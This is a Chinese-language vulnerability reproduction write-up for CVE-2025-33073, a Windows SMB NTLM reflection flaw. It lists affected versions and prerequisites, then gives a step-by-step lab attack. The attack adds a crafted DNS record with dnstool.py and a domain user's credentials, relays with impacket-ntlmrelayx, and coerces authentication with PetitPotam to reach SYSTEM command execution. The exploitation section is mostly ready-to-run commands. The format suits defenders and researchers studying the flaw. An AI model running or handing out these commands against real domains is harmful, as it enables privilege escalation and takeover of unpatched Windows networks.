0x00 前言
Windows 是微软研发的图形界面操作系统,应用于计算机、手机等设备,有普通版、服务器版、手机版等系列,是全球广泛使用的系统之一。
Windows SMB 是微软公司的一个网络文件共享协议。它允许计算机上的应用程序读取和写入文件以及从计算机网络中的服务器程序请求服务。
0x01 漏洞描述
CVE-2025-33073漏洞存在于Windows SMB中,允许已认证的远程攻击者在未经强制SMB签名的机器上,通过篡改DNS记录强制目标主机进行本地认证反射,最终以SYSTEM权限执行任意命令。
0x02 CVE编号
CVE-2025-33073
0x03 影响版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
0x04 利用条件
1、攻击者需拥有普通域账号权限
2、目标主机未强制启用SMB签名
3、域DNS可被篡改(如通过dnstool工具)
0x05 漏洞复现
1、环境搭建
攻击PC:192.168.2.5 (Kali Linux)
被攻击域内PC:192.168.2.3 (Windows 10)
DC:192.168.2.1(Windows Server 2012)
域内普通用户账号:test.com\test1
密码:Test..111
2、复现过程
(1)向域控添加dns记录
使用dnstool.py向域控添加一条dns记录。
下载工具包:
https://github.com/dirkjanm/krbrelayx
使用其中的dnstool.py
命令:
python dnstool.py -u 'test.com\test1' -p 'Test..111' -r win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.2.5 --action add 192.168.2.1
注意:
win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA的设置是被攻击机器名(win10pc)加1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,或者使用localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
在域控中可以看到添加的DNS记录。
(2)开始监听
Kali Linux中自带impacket-ntlmrelayx工具。
命令:
impacket-ntlmrelayx -t 192.168.2.3 -smb2support
(3)进行强制NTLM认证
工具下载:
https://github.com/topotam/PetitPotam
命令:
python PetitPotam.py -d test.com -u test1 -p Test..111 win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.2.3
在监听页面等待结果,如果不行,多执行几次强制NTLM认证的命令,成功获取到192.168.2.3的hash。
在192.168.2.3成功执行命令并返回结果。
0x06 参考链接
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
https://github.com/dirkjanm/krbrelayx
https://github.com/topotam/PetitPotam